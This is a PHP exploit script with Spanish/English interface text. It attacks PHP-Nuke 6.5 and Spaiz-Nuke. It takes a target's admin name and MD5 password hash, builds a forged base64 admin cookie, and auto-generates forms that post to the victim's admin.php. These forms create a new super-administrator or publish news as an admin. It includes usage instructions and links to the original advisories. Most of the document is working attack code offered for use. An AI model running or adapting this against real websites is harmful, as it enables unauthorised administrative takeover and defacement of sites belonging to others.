php-nuke.6.5.php.txt

`Hello, Here my Exploit for PHP-Nuke >= v6.5 & Spaiz-Nuke SQL > v1.2 SQL   
Injection  
Code in PHP:  
Grettings, Blade...  
  
<?php  
/* PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2  
By  
BBBBBBBB lll aaaaaaaa ddddddd eeeeeeeee  
BBBBBBBBB lll aaaaaaaaa ddddddddde eeeeeeeee  
BBBBBBBBBB lll aaaaaaaaad ddddddddde eeeeeeeeee  
BBB lll aad de  
BBB lll aaaaaaaaaad dde eeeeeeeeee  
BBBBBBBBBB lll aaaaaaaaaad ddd dde eeeeeeeeee  
BBBBBBBBBB lll aaaaaaaaaa ddd ddeeeeeeeeeeee  
BBBBBBBBBB lll aaa aaa ddd dddeeee  
BBB BBB lll aaa aaa ddd ddd eee  
BBB BBBB lll aaa aaa ddd ddd eee  
BBBBBBBBB lllllllaaa dddddddddd eeeeeeeeee  
BBBBBBBBB llllllaaa ddddddddddd eeeeeeeee  
BBBBBBBB lllll aa dddddddddd eeeeeee  
<[email protected]>  
  
|Blade «[email protected]»|  
****www.abez.org Of AbeZ  
***www.rzw.com.ar By XyborG  
**www.adictosnet.com.ar By LaKosa  
*www.fihezine.tsx.to Of FiH eZine  
*/  
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01   
Transitional//EN"><html><head>  
<title>PHP-Nuke And Spaiz-Nuke Injection Exploit v2.2 By   
Blade</title>  
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-   
1"><STYLE type=text/css>  
.bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY:   
Verdana,Arial,Helvetica,sans-serif }  
A:link { COLOR: #000066; TEXT-DECORATION: none }  
A:visited { COLOR: #000066; TEXT-DECORATION: none }  
A:active { COLOR: #000066; TEXT-DECORATION: none }  
A:hover { COLOR: #000066; TEXT-DECORATION: none }  
.button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY:   
Verdana,Arial,Helvetica,sans-serif }  
</STYLE></head><body bgcolor="#FDFEFF" text="#000000" link="#363636"   
vlink="#363636" alink="#d5ae83">  
<!-- PHP-Nuke & Spaiz-Nuke SQL Injection Exploit v2.2 - Original Code   
By Blade<[email protected]> -->';  
  
if (($action == "goAdmin") and ($server) and ($add_name) and ($add_email)   
and ($add_aid) and ($add_pwd)){  
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);  
$server = chop($server); $add_pwd = chop($add_pwd);  
$hash = $admin_name . ":" . $admin_hash . ":";  
$hash = base64_encode($hash);  
echo "<form name='add' method='post' action='http://" . $server .   
"/admin.php'>  
<input type='hidden' name='op' value='AddAuthor'>  
<input type='hidden' name='add_name' value='" . $add_name . "'>  
<input type='hidden' name='add_aid' value='" . $add_aid . "'>  
<input type='hidden' name='add_email' value='" . $add_email . "'>  
<input type='hidden' name='add_url' value='" . $add_url . "'>  
<input type='hidden' name='add_pwd' value='" . $add_pwd . "'>  
<input type='hidden' name='add_radminsuper' value='" .   
$add_radminsuper . "'>  
<input type='hidden' name='admin' value=" . $hash .">  
<center><font size='1' face='Verdana, Arial, Helvetica, sans-   
serif'>Servidor  
vulnerable : <strong>http://" . $server . "</strong> . <br>Clave   
Hash : <strong>" .  
$hash . "</strong> . <br>Nuevo Administrador : <strong>" . $add_name   
. "</strong>.  
En caso de que estos datos no sean correctos vuelva atras desde  
<a href='javascript:history.back()   
'><strong>«Aquí»</strong></a>.</font>  
<br><br><font size='1' face='Verdana, Arial, Helvetica, sans-   
serif'><b>Si son correctos  
continue la operacion agregando el nuevo   
Administrador.</b></font></center>  
<center><input name='AddSysop' type='submit' id='AddSysop'   
value='Agregar Administrador' class='button'></center>  
</form>";  
} elseif (($action == "goNews") and ($server) and ($subject) and   
($hometext) and ($bodytext)){  
  
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);  
$server = chop($server); $add_pwd = chop($add_pwd);  
$hash = $admin_name . ":" . $admin_hash . ":";  
$hash = base64_encode($hash);  
echo "<form name='addNews' method='post' action='http://" . $server   
. "/admin.php'>  
<input name='op' type='hidden' id='op' value='PostAdminStory'>  
<input name='topic' type='hidden' id='topic' value='1'>  
<input name='catid' type='hidden' id='catid' value='0'>  
<input name='ihome' type='hidden' id='ihome' value='0'>  
<input type='hidden' name='subject' value='" . $subject . "'>  
<input type='hidden' name='hometext' value='" . $hometext . "'>  
<input type='hidden' name='bodytext' value='" . $bodytext . "'>  
<input type='hidden' name='acomm' value='" . $acomm . "'>  
<input type='hidden' name='automated' value='" . $automated . "'>  
<input type='hidden' name='day' value='" . $day . "'>  
<input type='hidden' name='month' value='" . $month . "'>  
<input type='hidden' name='year' value='" . $year . "'>  
<input type='hidden' name='hour' value='" . $hour . "'>  
<input type='hidden' name='min' value='" . $min . "'>  
<input type='hidden' name='admin' value=" . $hash .">  
<center>  
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'>Servidor   
vulnerable : <strong>http://" . $server . "</strong> . <br>  
Clave Hash : <strong>" . $hash . "</strong> . <br>  
Asunto de la Noticia: <strong>" . $subject . "</strong>. <br>  
La Noticia es: <strong>" . $hometext . "</strong>. <br>  
En caso de que estos datos no sean correctos vuelva atras desde <a   
href='javascript:history.back()'><strong>«Aquí»</strong></a>.</font> <br>  
<br>  
<font size='1' face='Verdana, Arial, Helvetica, sans-serif'><b>Si   
son correctos continue la operacion agregando la noticia.</b></font>   
</center>  
<center>  
<input name='AddSysop' type='submit' id='AddSysop' value='Agregar   
Noticia' class='button'>  
</center>  
</form>";  
} elseif($exploit == "news") {  
echo'<FORM action="' . $PHP_Self . '" method=post>  
<TABLE width="50%" border=0 align="center" cellPadding=0   
cellSpacing=0>  
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"   
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server  
Vulnerable:</u></font></strong></div></TD>  
</TR>  
<TR> <TD width="39%"> <div align="center"><font size="1"   
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server  
Adress:</strong></font></div></TD>  
<TD width="13%"><div align="right"><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">http://</font></div></TD>  
<TD width="48%"><div align="left"><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">  
</font>  
<input name="server" type="text" class="bginput" id="server"   
value="www.">  
</div></TD>  
</TR>  
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">Admin  
Name:</font></strong></div></TD>  
<TD>&nbsp;</TD>  
<TD> <p align="left"> <input name="admin_name" type="text"   
id="admin_name" class="bginput">  
</p></TD>  
</TR>  
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>  
<TD>&nbsp;</TD>  
<TD> <p align="left">  
<input name="admin_hash" type="text" id="admin_hash" size="40"   
class="bginput">  
</p></TD>  
</TR>  
</TABLE><br>  
<table width="50%" border="0" align="center">  
<tr>  
<td><div align="center"><strong><font color="#003366" size="1"   
face="Verdana, Arial, Helvetica, sans-serif"><u>The   
News:</u></font></strong></div></td>  
</tr>  
<tr> <td><div align="center"><strong><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">  
<input name="action" type="hidden" id="action" value="goNews">  
Title</font></strong><font size="1" face="Verdana, Arial, Helvetica,   
sans-serif">(Obligatory)<strong>:<br>  
<input size=50 name=subject class="bginput">  
</strong></font></div></td>  
</tr>  
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,   
Helvetica, sans-serif"><strong>Text of  
the News</strong>(Obligatory)<strong>:<br>  
<textarea name=hometext rows=5 wrap=virtual cols=50   
class="bginput"></textarea>  
</strong></font></div></td>  
</tr>  
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,   
Helvetica, sans-serif"><strong>Extended  
Text</strong>(Obligatory)<strong>:<br>  
<textarea name=bodytext rows=12 wrap=virtual cols=50   
class="bginput"></textarea>  
</strong></font></div></td>  
</tr>  
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,   
Helvetica, sans-serif">Active Commentaries for  
this News?<strong>&nbsp;&nbsp;  
<input type=radio checked value=0 name=acomm>  
Yes&nbsp;  
<input type=radio value=1 name=acomm>  
No</strong><strong></strong></font></div></td>  
</tr>  
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,   
Helvetica, sans-serif">You want to program  
this history?<strong>&nbsp;&nbsp;  
<input type=radio value=1 name=automated>  
Yes &nbsp;&nbsp;  
<input type=radio checked value=0 name=automated>  
No<br>  
<br>  
Day:  
<input name="day" type="text" id="day3" value="' . date(d) . '"   
size="4" class="bginput">  
Month:  
<select name="month" id="select2" class="bginput">  
<option value="1">1</option>  
<option value="2">2</option>  
<option value="3">3</option>  
<option value="4">4</option>  
<option value="5">5</option>  
<option value="6">6</option>  
<option value="7">7</option>  
<option value="8">8</option>  
<option value="9">9</option>  
<option value="10">10</option>  
<option value="11">11</option>  
<option value="12" selected>12</option>  
</select>  
Year:  
<input maxlength=4 size=5 value="' . date(Y) . '" name=year   
class="bginput">  
<br>  
Hour:  
<select name=hour class="bginput">  
<option selected name="hour">00</option>  
<option name="hour">01</option>  
<option name="hour">02</option>  
<option name="hour">03</option>  
<option name="hour">04</option>  
<option name="hour">05</option>  
<option name="hour">06</option>  
<option name="hour">07</option>  
<option name="hour">08</option>  
<option name="hour">09</option>  
<option name="hour">10</option>  
<option name="hour">11</option>  
<option name="hour">12</option>  
<option name="hour">13</option>  
<option name="hour">14</option>  
<option name="hour">15</option>  
<option name="hour">16</option>  
<option name="hour">17</option>  
<option name="hour">18</option>  
<option name="hour">19</option>  
<option name="hour">20</option>  
<option name="hour">21</option>  
<option name="hour">22</option>  
<option name="hour">23</option>  
</select>  
: <select name=min class="bginput">  
<option selected name="min">00</option>  
<option name="min">05</option>  
<option name="min">10</option>  
<option name="min">15</option>  
<option name="min">20</option>  
<option name="min">25</option>  
<option name="min">30</option>  
<option name="min">35</option>  
<option name="min">40</option>  
<option name="min">45</option>  
<option name="min">50</option>  
<option name="min">55</option>  
</select>  
: 00</strong></font></div></td>  
</tr>  
<tr> <td><div align="center"><font size="1" face="Verdana, Arial,   
Helvetica, sans-serif"><strong> <input name="submit" type=submit value="Add   
News" class="button">  
</strong></font></div></td>  
</tr>  
</table><center><strong><font color="#000066" size="1"   
face="Tahoma"><a href="' . $PHP_Self . '?exploit=admin">[ View exploit of   
the Administrators ]</a> </font></strong></center>';  
} else {  
echo'<FORM action="' . $PHP_Self . '" method=post>  
<p align="center"><u><strong><font size="2" face="Verdana, Arial,   
Helvetica, sans-serif">  
<input name="action" type="hidden" id="action" value="goAdmin">  
</font></strong></u></p>  
<div align="center">  
<TABLE width="50%" border=0 align="center" cellPadding=0   
cellSpacing=0>  
<TR><TD colspan="3"><div align="center"><strong><font color="#003366"   
size="1" face="Verdana, Arial, Helvetica, sans-serif"><u>Server  
Vulnerable:</u></font></strong></div></TD>  
</TR>  
<TR> <TD width="39%"> <div align="center"><font size="1"   
face="Verdana, Arial, Helvetica, sans-serif"><strong>Server  
Adress:</strong></font></div></TD>  
<TD width="13%"><div align="right"><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">http://</font></div></TD>  
<TD width="48%"><div align="left"><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">  
</font>  
<input name="server" type="text" class="bginput" id="server"   
value="www.">  
</div></TD>  
</TR>  
<TR> <TD> <div align="center"><strong><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">Admin  
Name:</font></strong></div></TD>  
<TD>&nbsp;</TD>  
<TD> <p align="left">  
<input name="admin_name" type="text" id="admin_name" class="bginput">  
</p></TD>  
</TR>  
<TR> <TD><div align="center"><strong><font size="1" face="Verdana,   
Arial, Helvetica, sans-serif">Password MD5:</font></strong></div></TD>  
<TD>&nbsp;</TD>  
<TD> <p align="left">  
<input name="admin_hash" type="text" id="admin_hash" size="40"   
class="bginput">  
</p></TD>  
</TR>  
</TABLE>  
<br>  
</div>  
<TABLE width="50%" border=0 align="center">  
<TBODY>  
<TR> <TD colspan="2"><div align="center"><strong><font   
color="#003366" size="1" face="Verdana, Arial, Helvetica, sans-   
serif"><u>Account  
Data:</u></font></strong></div></TD>  
</TR>  
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-   
serif"><strong>Name:</strong></font></TD>  
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">   
<INPUT maxLength=50 size=30 name=add_name class="bginput">  
(Obligatory)</font></TD>  
</TR>  
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-   
serif"><strong>Nickname:</strong></font></TD>  
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">   
<INPUT maxLength=30 size=30 name=add_aid class="bginput">  
(Obligatory)</font></TD>  
</TR>  
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-   
serif"><strong>E-Mail:</strong></font></TD>  
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">   
<INPUT maxLength=60 size=30 name=add_email class="bginput">  
(Obligatory)</font></TD>  
</TR>  
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-   
serif">URL:</font></TD>  
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">   
<INPUT name=add_url class="bginput" value="http://www." size=30   
maxLength=60>  
<strong> <input name="add_radminsuper" type="hidden"   
id="add_radminsuper" value="1">  
</strong> </font></TD>  
</TR>  
<TR> <TD><font size="1" face="Verdana, Arial, Helvetica, sans-   
serif"><strong>Password:</strong></font></TD>  
<TD><font size="1" face="Verdana, Arial, Helvetica, sans-serif">   
<INPUT type=password maxLength=12 size=12 name=add_pwd class="bginput">  
(Obligatory)</font></TD>  
</TR>  
<INPUT type=hidden value=AddAuthor name=op>  
</TABLE> <div align="center">  
<INPUT name="submit" type=submit value="Create Administrator"   
class="button">  
</div>  
</FORM><center><strong><font color="#000066" size="1"   
face="Tahoma"><a href="' . $PHP_Self . '?exploit=news">[ View exploit of   
News ]</a> </font></strong></center>';  
} if (($action == "goAdmin") or ($action == "goNews")){  
echo'';  
  
}if (($action != "goAdmin") and ($action != "goNews")){  
echo'<br><table width="100%" border="0" align="center">  
<tr> <td colspan="2"><div align="center"><font color="#003366"   
size="1" face="Verdana, Arial, Helvetica, sans-   
serif"><strong><u>Usage:</u></strong></font></div></td>  
</tr>  
<tr> <td width="15%"><strong><font size="1"   
face="Tahoma">&raquo;Server Adress  
:</font></strong></td>  
<td width="85%"><font size="1" face="Tahoma">It is the URL   
corresponding to the  
vulnerable Vestibule in PHP-Nuke. Example:   
www.phpnuke.org.</font></td>  
</tr>  
<tr> <td><strong><font size="1" face="Tahoma">&raquo;Nombre Admin   
:</font></strong></td>  
<td><font size="1" face="Tahoma">It is the identity in value of name,  
of the administrator who password is known enciphered. Example :   
xMan.</font></td>  
</tr>  
<tr> <td><strong><font size="1" face="Tahoma">&raquo;Password MD5   
:</font></strong></td>  
<td><font size="1" face="Tahoma">He is password enciphered in MD5 of   
the administrator,  
whose name is known. Example: 1ea52f26e7e0ce08e462f87f5e35096c   
</font></td>  
</tr>  
</table><br><div align="center">  
<table width="45%" border="0" align="center">  
<tr> <td colspan="2"><div align="center"><font color="#003366"   
size="1" face="Verdana, Arial, Helvetica, sans-   
serif"><strong><u>References:</u></strong></font></div></td>  
</tr>  
<tr> <td width="47%"><div align="center"><font size="1"   
face="Tahoma">Discoverers  
Bug :</font></div></td>  
<td width="53%"><div align="center"><font size="1" face="Tahoma"><a   
href="http://rst.void.ru/texts/advisory10.htm"   
target="_blank">http://www.rst.void.ru</a> </font> <font size="1"   
face="Tahoma"></font></div></td>  
</tr>  
<tr> <td><div align="center"><font size="1"   
face="Tahoma"><strong>More Information</strong>  
:</font></div></td>  
<td><div align="center"><strong><font size="1" face="Tahoma"><a   
href="http://www.rzw.com.ar/article895.html"   
target="_blank"><u>http://www.rzw.com.ar</u></a></font></strong></div></td>  
</tr>  
<tr> <td><div align="center"><font size="1" face="Tahoma">More   
Information :</font></div></td>  
<td><div align="center"><font size="1" face="Tahoma"><a   
href="http://www.security.nnov.ru/search/document.asp?docid=5201"   
target="_blank">http://www.security.nnov.ru</a></font></div></td>  
</tr>  
<tr> <td>  
<div align="center"><font size="1" face="Tahoma">More Information   
:</font></div></td>  
<td><div align="center"><font size="1" face="Tahoma"><a   
href="http://www.cyruxnet.com.ar/phpnuke_modules.htm"   
target="_blank">http://www.cyruxnet.com.ar</a></font></div></td>  
</tr>  
</table>';  
  
}  
echo'<center><p><a href="mailto:[email protected]"><u><strong><font   
color="#CC0000" size="1" face="Tahoma">Original Exploit Code By   
Blade.</font></strong></u></a><br><font color="#003366" size="1"   
face="Verdana"><b>Version 2.2.</b></font></p></center>  
</div>  
</body>  
</html>';  
?>  
`